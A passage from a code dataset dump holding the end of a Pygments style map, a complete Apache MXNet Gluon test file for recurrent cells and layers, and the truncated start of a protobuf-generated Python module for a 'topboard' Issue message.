Generic.Subheading: "bold " + AQUA, # class: 'gu'
Generic.Traceback: "", # class: 'gt'
}
|
py | b410362c8fd16545df27364c269de86527958577 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
from mxnet import gluon, nd
import numpy as np
import copy
from numpy.testing import assert_allclose
import unittest
from mxnet.test_utils import almost_equal, assert_almost_equal
from common import assert_raises_cudnn_not_satisfied
def test_rnn():
cell = gluon.rnn.RNNCell(100, prefix='rnn_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == ['rnn_h2h_bias', 'rnn_h2h_weight',
'rnn_i2h_bias', 'rnn_i2h_weight']
assert outputs.list_outputs() == ['rnn_t0_out_output', 'rnn_t1_out_output', 'rnn_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_lstm():
cell = gluon.rnn.LSTMCell(100, prefix='rnn_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == ['rnn_h2h_bias', 'rnn_h2h_weight', 'rnn_i2h_bias', 'rnn_i2h_weight']
assert outputs.list_outputs() == ['rnn_t0_out_output', 'rnn_t1_out_output', 'rnn_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_lstm_forget_bias():
forget_bias = 2.0
stack = gluon.rnn.SequentialRNNCell()
stack.add(gluon.rnn.LSTMCell(100, i2h_bias_initializer=mx.init.LSTMBias(forget_bias), prefix='l0_'))
stack.add(gluon.rnn.LSTMCell(100, i2h_bias_initializer=mx.init.LSTMBias(forget_bias), prefix='l1_'))
dshape = (32, 1, 200)
data = mx.sym.Variable('data')
sym, _ = stack.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.cpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
bias_argument = next(x for x in sym.list_arguments() if x.endswith('i2h_bias'))
expected_bias = np.hstack([np.zeros((100,)),
forget_bias * np.ones(100, ), np.zeros((2 * 100,))])
assert_allclose(mod.get_params()[0][bias_argument].asnumpy(), expected_bias)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_cpu_inference():
# should behave the same as lstm cell
EXPECTED_LSTM_OUTPUT = np.array([[[0.72045636, 0.72045636, 0.95215213, 0.95215213],
[0.72045636, 0.72045636, 0.95215213, 0.95215213]],
[[0.95215213, 0.95215213, 0.72045636, 0.72045636],
[0.95215213, 0.95215213, 0.72045636, 0.72045636]]])
x = mx.nd.ones(shape=(2, 2, 2))
model = mx.gluon.rnn.LSTM(2, num_layers=6, bidirectional=True)
model_cell = model._unfuse()
model.initialize(mx.init.One())
y = model(x).asnumpy()
y_cell = model_cell.unroll(2, x, layout='TNC', merge_outputs=True)[0].asnumpy()
mx.test_utils.assert_almost_equal(y_cell, EXPECTED_LSTM_OUTPUT,
rtol=1e-3, atol=1e-5)
mx.test_utils.assert_almost_equal(y, EXPECTED_LSTM_OUTPUT,
rtol=1e-3, atol=1e-5)
def test_gru():
cell = gluon.rnn.GRUCell(100, prefix='rnn_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == ['rnn_h2h_bias', 'rnn_h2h_weight', 'rnn_i2h_bias', 'rnn_i2h_weight']
assert outputs.list_outputs() == ['rnn_t0_out_output', 'rnn_t1_out_output', 'rnn_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_residual():
cell = gluon.rnn.ResidualCell(gluon.rnn.GRUCell(50, prefix='rnn_'))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == \
['rnn_h2h_bias', 'rnn_h2h_weight', 'rnn_i2h_bias', 'rnn_i2h_weight']
# assert outputs.list_outputs() == \
# ['rnn_t0_out_plus_residual_output', 'rnn_t1_out_plus_residual_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 50), (10, 50)]
outputs = outputs.eval(rnn_t0_data=mx.nd.ones((10, 50)),
rnn_t1_data=mx.nd.ones((10, 50)),
rnn_i2h_weight=mx.nd.zeros((150, 50)),
rnn_i2h_bias=mx.nd.zeros((150,)),
rnn_h2h_weight=mx.nd.zeros((150, 50)),
rnn_h2h_bias=mx.nd.zeros((150,)))
expected_outputs = np.ones((10, 50))
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
assert np.array_equal(outputs[1].asnumpy(), expected_outputs)
def test_residual_bidirectional():
cell = gluon.rnn.ResidualCell(
gluon.rnn.BidirectionalCell(
gluon.rnn.GRUCell(25, prefix='rnn_l_'),
gluon.rnn.GRUCell(25, prefix='rnn_r_')))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=False)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == \
['rnn_l_h2h_bias', 'rnn_l_h2h_weight', 'rnn_l_i2h_bias', 'rnn_l_i2h_weight',
'rnn_r_h2h_bias', 'rnn_r_h2h_weight', 'rnn_r_i2h_bias', 'rnn_r_i2h_weight']
# assert outputs.list_outputs() == \
# ['bi_t0_plus_residual_output', 'bi_t1_plus_residual_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 50), (10, 50)]
outputs = outputs.eval(rnn_t0_data=mx.nd.ones((10, 50))+5,
rnn_t1_data=mx.nd.ones((10, 50))+5,
rnn_l_i2h_weight=mx.nd.zeros((75, 50)),
rnn_l_i2h_bias=mx.nd.zeros((75,)),
rnn_l_h2h_weight=mx.nd.zeros((75, 25)),
rnn_l_h2h_bias=mx.nd.zeros((75,)),
rnn_r_i2h_weight=mx.nd.zeros((75, 50)),
rnn_r_i2h_bias=mx.nd.zeros((75,)),
rnn_r_h2h_weight=mx.nd.zeros((75, 25)),
rnn_r_h2h_bias=mx.nd.zeros((75,)))
expected_outputs = np.ones((10, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
assert np.array_equal(outputs[1].asnumpy(), expected_outputs)
def test_stack():
cell = gluon.rnn.SequentialRNNCell()
for i in range(5):
if i == 1:
cell.add(gluon.rnn.ResidualCell(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_' % i)))
else:
cell.add(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_'%i))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
keys = sorted(cell.collect_params().keys())
for i in range(5):
assert 'rnn_stack%d_h2h_weight'%i in keys
assert 'rnn_stack%d_h2h_bias'%i in keys
assert 'rnn_stack%d_i2h_weight'%i in keys
assert 'rnn_stack%d_i2h_bias'%i in keys
assert outputs.list_outputs() == ['rnn_stack4_t0_out_output', 'rnn_stack4_t1_out_output', 'rnn_stack4_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_hybridstack():
cell = gluon.rnn.HybridSequentialRNNCell()
for i in range(5):
if i == 1:
cell.add(gluon.rnn.ResidualCell(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_' % i)))
else:
cell.add(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_'%i))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
keys = sorted(cell.collect_params().keys())
for i in range(5):
assert 'rnn_stack%d_h2h_weight'%i in keys
assert 'rnn_stack%d_h2h_bias'%i in keys
assert 'rnn_stack%d_i2h_weight'%i in keys
assert 'rnn_stack%d_i2h_bias'%i in keys
assert outputs.list_outputs() == ['rnn_stack4_t0_out_output', 'rnn_stack4_t1_out_output', 'rnn_stack4_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
# Test HybridSequentialRNNCell nested in nn.HybridBlock, SequentialRNNCell will fail in this case
class BidirectionalOfSequential(gluon.HybridBlock):
def __init__(self):
super(BidirectionalOfSequential, self).__init__()
with self.name_scope():
cell0 = gluon.rnn.HybridSequentialRNNCell()
cell0.add(gluon.rnn.LSTMCell(100))
cell0.add(gluon.rnn.LSTMCell(100))
cell1 = gluon.rnn.HybridSequentialRNNCell()
cell1.add(gluon.rnn.LSTMCell(100))
cell1.add(gluon.rnn.LSTMCell(100))
self.rnncell = gluon.rnn.BidirectionalCell(cell0, cell1)
def hybrid_forward(self, F, x):
return self.rnncell.unroll(3, x, layout="NTC", merge_outputs=True)
x = mx.nd.random.uniform(shape=(10, 3, 100))
net = BidirectionalOfSequential()
net.collect_params().initialize()
outs, _ = net(x)
assert outs.shape == (10, 3, 200)
def test_bidirectional():
cell = gluon.rnn.BidirectionalCell(
gluon.rnn.LSTMCell(100, prefix='rnn_l0_'),
gluon.rnn.LSTMCell(100, prefix='rnn_r0_'),
output_prefix='rnn_bi_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert outputs.list_outputs() == ['rnn_bi_t0_output', 'rnn_bi_t1_output', 'rnn_bi_t2_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 200), (10, 200), (10, 200)]
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_layer_bidirectional():
class RefBiLSTM(gluon.Block):
def __init__(self, size, **kwargs):
super(RefBiLSTM, self).__init__(**kwargs)
with self.name_scope():
self._lstm_fwd = gluon.rnn.LSTM(size, bidirectional=False, prefix='l0')
self._lstm_bwd = gluon.rnn.LSTM(size, bidirectional=False, prefix='r0')
def forward(self, inpt):
fwd = self._lstm_fwd(inpt)
bwd_inpt = nd.flip(inpt, 0)
bwd = self._lstm_bwd(bwd_inpt)
bwd = nd.flip(bwd, 0)
return nd.concat(fwd, bwd, dim=2)
size = 7
in_size = 5
weights = {}
for d in ['l', 'r']:
weights['lstm_{}0_i2h_weight'.format(d)] = mx.random.uniform(shape=(size*4, in_size))
weights['lstm_{}0_h2h_weight'.format(d)] = mx.random.uniform(shape=(size*4, size))
weights['lstm_{}0_i2h_bias'.format(d)] = mx.random.uniform(shape=(size*4,))
weights['lstm_{}0_h2h_bias'.format(d)] = mx.random.uniform(shape=(size*4,))
net = gluon.rnn.LSTM(size, bidirectional=True, prefix='lstm_')
ref_net = RefBiLSTM(size, prefix='lstm_')
net.initialize()
ref_net.initialize()
net_params = net.collect_params()
ref_net_params = ref_net.collect_params()
for k in weights:
net_params[k].set_data(weights[k])
ref_net_params[k.replace('l0', 'l0l0').replace('r0', 'r0l0')].set_data(weights[k])
data = mx.random.uniform(shape=(11, 10, in_size))
assert_allclose(net(data).asnumpy(), ref_net(data).asnumpy())
def test_zoneout():
cell = gluon.rnn.ZoneoutCell(gluon.rnn.RNNCell(100, prefix='rnn_'), zoneout_outputs=0.5,
zoneout_states=0.5)
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_unroll_layout():
cell = gluon.rnn.HybridSequentialRNNCell()
for i in range(5):
if i == 1:
cell.add(gluon.rnn.ResidualCell(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_' % i)))
else:
cell.add(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_'%i))
cell.collect_params().initialize()
inputs = [mx.nd.random.uniform(shape=(10,50)) for _ in range(3)]
outputs, _ = cell.unroll(3, inputs, layout='TNC')
assert outputs[0].shape == (10, 100)
assert outputs[1].shape == (10, 100)
assert outputs[2].shape == (10, 100)
outputs, _ = cell.unroll(3, inputs, layout='NTC')
assert outputs[0].shape == (10, 100)
assert outputs[1].shape == (10, 100)
assert outputs[2].shape == (10, 100)
def check_rnn_forward(layer, inputs, deterministic=True):
if isinstance(inputs, mx.nd.NDArray):
inputs.attach_grad()
else:
for x in inputs:
x.attach_grad()
layer.collect_params().initialize()
with mx.autograd.record():
out = layer.unroll(3, inputs, merge_outputs=False)[0]
mx.autograd.backward(out)
out = layer.unroll(3, inputs, merge_outputs=True)[0]
out.backward()
np_out = out.asnumpy()
if isinstance(inputs, mx.nd.NDArray):
np_dx = inputs.grad.asnumpy()
else:
np_dx = np.stack([x.grad.asnumpy() for x in inputs], axis=1)
layer.hybridize()
with mx.autograd.record():
out = layer.unroll(3, inputs, merge_outputs=False)[0]
mx.autograd.backward(out)
out = layer.unroll(3, inputs, merge_outputs=True)[0]
out.backward()
if isinstance(inputs, mx.nd.NDArray):
input_grads = inputs.grad.asnumpy()
else:
input_grads = np.stack([x.grad.asnumpy() for x in inputs], axis=1)
if deterministic:
mx.test_utils.assert_almost_equal(np_out, out.asnumpy(), rtol=1e-3, atol=1e-5)
mx.test_utils.assert_almost_equal(np_dx, input_grads, rtol=1e-3, atol=1e-5)
def test_rnn_cells():
check_rnn_forward(gluon.rnn.LSTMCell(100, input_size=200), mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.RNNCell(100, input_size=200), mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.GRUCell(100, input_size=200), mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.LSTMCell(100, input_size=200),
[mx.nd.ones((8, 200)), mx.nd.ones((8, 200)), mx.nd.ones((8, 200))])
check_rnn_forward(gluon.rnn.RNNCell(100, input_size=200),
[mx.nd.ones((8, 200)), mx.nd.ones((8, 200)), mx.nd.ones((8, 200))])
check_rnn_forward(gluon.rnn.GRUCell(100, input_size=200),
[mx.nd.ones((8, 200)), mx.nd.ones((8, 200)), mx.nd.ones((8, 200))])
bilayer = gluon.rnn.BidirectionalCell(gluon.rnn.LSTMCell(100, input_size=200),
gluon.rnn.LSTMCell(100, input_size=200))
check_rnn_forward(bilayer, mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.DropoutCell(0.5), mx.nd.ones((8, 3, 200)), False)
check_rnn_forward(gluon.rnn.ZoneoutCell(gluon.rnn.LSTMCell(100, input_size=200),
0.5, 0.2),
mx.nd.ones((8, 3, 200)), False)
net = gluon.rnn.SequentialRNNCell()
net.add(gluon.rnn.LSTMCell(100, input_size=200))
net.add(gluon.rnn.RNNCell(100, input_size=100))
net.add(gluon.rnn.GRUCell(100, input_size=100))
check_rnn_forward(net, mx.nd.ones((8, 3, 200)))
def test_rnn_cells_export_import():
class RNNLayer(gluon.HybridBlock):
def __init__(self):
super(RNNLayer, self).__init__()
with self.name_scope():
self.cell = gluon.rnn.RNNCell(hidden_size=1)
def hybrid_forward(self, F, seq):
outputs, state = self.cell.unroll(inputs=seq, length=2, merge_outputs=True)
return outputs
class LSTMLayer(gluon.HybridBlock):
def __init__(self):
super(LSTMLayer, self).__init__()
with self.name_scope():
self.cell = gluon.rnn.LSTMCell(hidden_size=1)
def hybrid_forward(self, F, seq):
outputs, state = self.cell.unroll(inputs=seq, length=2, merge_outputs=True)
return outputs
class GRULayer(gluon.HybridBlock):
def __init__(self):
super(GRULayer, self).__init__()
with self.name_scope():
self.cell = gluon.rnn.GRUCell(hidden_size=1)
def hybrid_forward(self, F, seq):
outputs, state = self.cell.unroll(inputs=seq, length=2, merge_outputs=True)
return outputs
for hybrid in [RNNLayer(), LSTMLayer(), GRULayer()]:
hybrid.initialize()
hybrid.hybridize()
input = mx.nd.ones(shape=(1, 2, 1))
output1 = hybrid(input)
hybrid.export(path="./model", epoch=0)
symbol = mx.gluon.SymbolBlock.imports(
symbol_file="./model-symbol.json",
input_names=["data"],
param_file="./model-0000.params",
ctx=mx.Context.default_ctx
)
output2 = symbol(input)
assert_almost_equal(output1.asnumpy(), output2.asnumpy())
def check_rnn_layer_forward(layer, inputs, states=None, run_only=False, ctx=mx.cpu()):
layer.collect_params().initialize(ctx=ctx)
inputs = inputs.as_in_context(ctx)
inputs.attach_grad()
if states is not None:
if isinstance(states, (list, tuple)):
states = [s.as_in_context(ctx) for s in states]
else:
states = states.as_in_context(ctx)
with mx.autograd.record():
if states is None:
out = layer(inputs)
else:
out = layer(inputs, states)
if states is not None:
assert isinstance(out, (list, tuple)) and len(out) == 2
out = out[0]
else:
assert isinstance(out, mx.nd.NDArray)
out.backward()
np_out = out.asnumpy()
np_dx = inputs.grad.asnumpy()
layer.hybridize()
with mx.autograd.record():
if states is not None:
out = layer(inputs, states)
assert isinstance(out, (list, tuple)) and len(out) == 2
out = out[0]
else:
out = layer(inputs)
assert isinstance(out, mx.nd.NDArray)
out.backward()
if states is not None:
layer(inputs, states) # test is_training = false
else:
layer(inputs)
if not run_only:
mx.test_utils.assert_almost_equal(np_out, out.asnumpy(), rtol=1e-3, atol=1e-5)
mx.test_utils.assert_almost_equal(np_dx, inputs.grad.asnumpy(), rtol=1e-3, atol=1e-5)
def run_rnn_layers(dtype, dtype2, ctx=mx.cpu()):
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype), ctx=ctx)
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, dtype=dtype, bidirectional=True), mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype), ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2,dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype), ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2,dtype=dtype, bidirectional=True), mx.nd.ones((8, 3, 20), dtype=dtype), [mx.nd.ones((4, 3, 10), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype)],ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, dtype=dtype, ), mx.nd.ones((8, 3, 20), dtype=dtype),ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, dtype=dtype, bidirectional=True), mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype),ctx=ctx)
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, dtype=dtype, dropout=0.5), mx.nd.ones((8, 3, 20), dtype=dtype),
run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, bidirectional=True, dropout=0.5, dtype=dtype),
mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype), run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2, dropout=0.5, dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype),
run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2, bidirectional=True, dropout=0.5, dtype=dtype),
mx.nd.ones((8, 3, 20), dtype=dtype),
[mx.nd.ones((4, 3, 10), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype)], run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, dropout=0.5, dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype),
run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, bidirectional=True, dropout=0.5, dtype=dtype),
mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype), run_only=True, ctx=ctx)
net = gluon.nn.Sequential()
net.add(gluon.rnn.LSTM(10, bidirectional=True, dtype=dtype2))
net.add(gluon.nn.BatchNorm(axis=2))
net.add(gluon.nn.Flatten())
net.add(gluon.nn.Dense(3, activation='relu'))
net.collect_params().initialize(ctx=ctx)
net.cast(dtype)
with mx.autograd.record():
out = net(mx.nd.ones((2, 3, 10), dtype=dtype, ctx=ctx))
out.backward()
out = out.asnumpy()
net2 = gluon.nn.HybridSequential()
net2.add(gluon.rnn.LSTM(10, bidirectional=True, dtype=dtype2))
net2.add(gluon.nn.BatchNorm(axis=2))
net2.add(gluon.nn.Flatten())
net2.add(gluon.nn.Dense(3, activation='relu'))
net2.hybridize()
net2.collect_params().initialize(ctx=ctx)
net2.cast(dtype)
with mx.autograd.record():
out = net2(mx.nd.ones((2, 3, 10), dtype=dtype, ctx=ctx))
out.backward()
out = out.asnumpy()
net3 = gluon.nn.HybridSequential()
net3.add(gluon.rnn.LSTM(10, bidirectional=True, dtype=dtype))
net3.add(gluon.nn.BatchNorm(axis=2))
net3.add(gluon.nn.Flatten())
net3.add(gluon.nn.Dense(3, activation='relu'))
net3.hybridize()
net3.collect_params().initialize(ctx=ctx)
net3.cast(dtype2)
with mx.autograd.record():
out = net3(mx.nd.ones((2, 3, 10), dtype=dtype2, ctx=ctx))
out.backward()
out = out.asnumpy()
def test_rnn_layers_fp32():
run_rnn_layers('float32', 'float32')
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@unittest.skipIf(mx.context.num_gpus() == 0, "RNN FP16 only implemented for GPU for now")
def test_rnn_layers_fp16():
run_rnn_layers('float16', 'float32', mx.gpu())
def test_rnn_unroll_variant_length():
# Test for imperative usage
cell_list = []
for base_cell_class in [gluon.rnn.RNNCell, gluon.rnn.LSTMCell, gluon.rnn.GRUCell]:
cell_list.append(base_cell_class(20))
cell_list.append(gluon.rnn.BidirectionalCell(
l_cell=base_cell_class(20),
r_cell=base_cell_class(20)))
cell_list.append(gluon.contrib.rnn.VariationalDropoutCell(base_cell=base_cell_class(20)))
stack_res_rnn_cell = gluon.rnn.SequentialRNNCell()
stack_res_rnn_cell.add(gluon.rnn.ResidualCell(base_cell=gluon.rnn.RNNCell(20)))
stack_res_rnn_cell.add(gluon.rnn.ResidualCell(base_cell=gluon.rnn.RNNCell(20)))
cell_list.append(stack_res_rnn_cell)
batch_size = 4
max_length = 10
valid_length = [3, 10, 5, 6]
valid_length_nd = mx.nd.array(valid_length)
for cell in cell_list:
cell.collect_params().initialize()
cell.hybridize()
# Test for NTC layout
data_nd = mx.nd.random.normal(0, 1, shape=(batch_size, max_length, 20))
outs, states = cell.unroll(length=max_length, inputs=data_nd,
valid_length=valid_length_nd,
merge_outputs=True,
layout='NTC')
for i, ele_length in enumerate(valid_length):
# Explicitly unroll each sequence and compare the final states and output
ele_out, ele_states = cell.unroll(length=ele_length,
inputs=data_nd[i:(i+1), :ele_length, :],
merge_outputs=True,
layout='NTC')
assert_allclose(ele_out.asnumpy(), outs[i:(i+1), :ele_length, :].asnumpy(),
atol=1E-4, rtol=1E-4)
if ele_length < max_length:
# Check the padded outputs are all zero
assert_allclose(outs[i:(i+1), ele_length:max_length, :].asnumpy(), 0)
for valid_out_state, gt_state in zip(states, ele_states):
assert_allclose(valid_out_state[i:(i+1)].asnumpy(), gt_state.asnumpy(),
atol=1E-4, rtol=1E-4)
# Test for TNC layout
data_nd = mx.nd.random.normal(0, 1, shape=(max_length, batch_size, 20))
outs, states = cell.unroll(length=max_length, inputs=data_nd,
valid_length=valid_length_nd,
layout='TNC')
for i, ele_length in enumerate(valid_length):
# Explicitly unroll each sequence and compare the final states and output
ele_out, ele_states = cell.unroll(length=ele_length,
inputs=data_nd[:ele_length, i:(i+1), :],
merge_outputs=True,
layout='TNC')
assert_allclose(ele_out.asnumpy(), outs[:ele_length, i:(i + 1), :].asnumpy(),
atol=1E-4, rtol=1E-4)
if ele_length < max_length:
# Check the padded outputs are all zero
assert_allclose(outs[ele_length:max_length, i:(i+1), :].asnumpy(), 0)
for valid_out_state, gt_state in zip(states, ele_states):
assert_allclose(valid_out_state[i:(i+1)].asnumpy(), gt_state.asnumpy(),
atol=1E-4, rtol=1E-4)
# For symbolic test, we need to make sure that it can be binded and run
data = mx.sym.var('data', shape=(4, 10, 2))
cell = gluon.rnn.RNNCell(100)
valid_length = mx.sym.var('valid_length', shape=(4,))
outs, states = cell.unroll(length=10, inputs=data, valid_length=valid_length,
merge_outputs=True, layout='NTC')
mod = mx.mod.Module(states[0], data_names=('data', 'valid_length'), label_names=None,
context=mx.cpu())
mod.bind(data_shapes=[('data', (4, 10, 2)), ('valid_length', (4,))], label_shapes=None)
mod.init_params()
mod.forward(mx.io.DataBatch([mx.random.normal(0, 1, (4, 10, 2)), mx.nd.array([3, 6, 10, 2])]))
mod.get_outputs()[0].asnumpy()
def test_cell_fill_shape():
cell = gluon.rnn.LSTMCell(10)
cell.hybridize()
check_rnn_forward(cell, mx.nd.ones((2, 3, 7)))
assert cell.i2h_weight.shape[1] == 7, cell.i2h_weight.shape[1]
def test_layer_fill_shape():
layer = gluon.rnn.LSTM(10)
layer.hybridize()
check_rnn_layer_forward(layer, mx.nd.ones((3, 2, 7)))
print(layer)
assert layer.l0_i2h_weight.shape[1] == 7, layer.l0_i2h_weight.shape[1]
def test_bidirectional_unroll_valid_length():
# Test BidirectionalCell.
# In 1.3.1 version, after hybridize( ), BidirectionalCell would failed when pass valid_length to unroll( ).
class BiLSTM(gluon.nn.HybridBlock):
def __init__(self, rnn_size, time_step, **kwargs):
super(BiLSTM, self).__init__(**kwargs)
self.time_step = time_step
with self.name_scope():
self.bi_lstm = gluon.rnn.BidirectionalCell(
gluon.rnn.LSTMCell(rnn_size, prefix='rnn_l0_'),
gluon.rnn.LSTMCell(rnn_size, prefix='rnn_r0_'),
output_prefix='lstm_bi_')
def hybrid_forward(self, F, inputs, valid_len):
outputs, states = self.bi_lstm.unroll(self.time_step, inputs, valid_length=valid_len,
layout='NTC', merge_outputs=True)
return outputs, states
rnn_size, time_step = 100, 3
net = BiLSTM(rnn_size, time_step)
net.initialize()
net.hybridize()
inputs_data = mx.nd.random.uniform(shape=(10, 3, 50))
valid_len = mx.nd.array([1]*10)
outputs, _ = net(inputs_data, valid_len)
assert outputs.shape == (10, 3, 200)
if __name__ == '__main__':
import nose
nose.runmodule()
|
py | b410365883c4fbb3bf5d53fb62a470f3c55d2c0a | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: issue.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from topology_sdk.model.topboard import product_pb2 as topology__sdk_dot_model_dot_topboard_dot_product__pb2
from topology_sdk.model.topboard import sprint_pb2 as topology__sdk_dot_model_dot_topboard_dot_sprint__pb2
from topology_sdk.model.cmdb import user_pb2 as topology__sdk_dot_model_dot_cmdb_dot_user__pb2
from topology_sdk.model.topboard import attachment_pb2 as topology__sdk_dot_model_dot_topboard_dot_attachment__pb2
from topology_sdk.model.topboard import comment_pb2 as topology__sdk_dot_model_dot_topboard_dot_comment__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='issue.proto',
package='topboard',
syntax='proto3',
serialized_options=_b('ZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboard'),
serialized_pb=_b('\n\x0bissue.proto\x12\x08topboard\x1a)topology_sdk/model/topboard/product.proto\x1a(topology_sdk/model/topboard/sprint.proto\x1a\"topology_sdk/model/cmdb/user.proto\x1a,topology_sdk/model/topboard/attachment.proto\x1a)topology_sdk/model/topboard/comment.proto\"\xc4\x06\n\x05Issue\x12\x1f\n\x06parent\x18\x01 \x03(\x0b\x32\x0f.topboard.Issue\x12!\n\x08subtasks\x18\x02 \x03(\x0b\x32\x0f.topboard.Issue\x12\"\n\x07product\x18\x03 \x03(\x0b\x32\x11.topboard.Product\x12 \n\x06sprint\x18\x04 \x03(\x0b\x32\x10.topboard.Sprint\x12\x1f\n\x0bsubscribers\x18\x05 \x03(\x0b\x32\n.cmdb.User\x12\x1c\n\x08\x61ssignee\x18\x06 \x03(\x0b\x32\n.cmdb.User\x12\x1c\n\x08reporter\x18\x07 \x03(\x0b\x32\n.cmdb.User\x12)\n\x0b\x61ttachments\x18\x08 \x03(\x0b\x32\x14.topboard.Attachment\x12#\n\x08\x63omments\x18\t \x03(\x0b\x32\x11.topboard.Comment\x12,\n\tissueFrom\x18\n 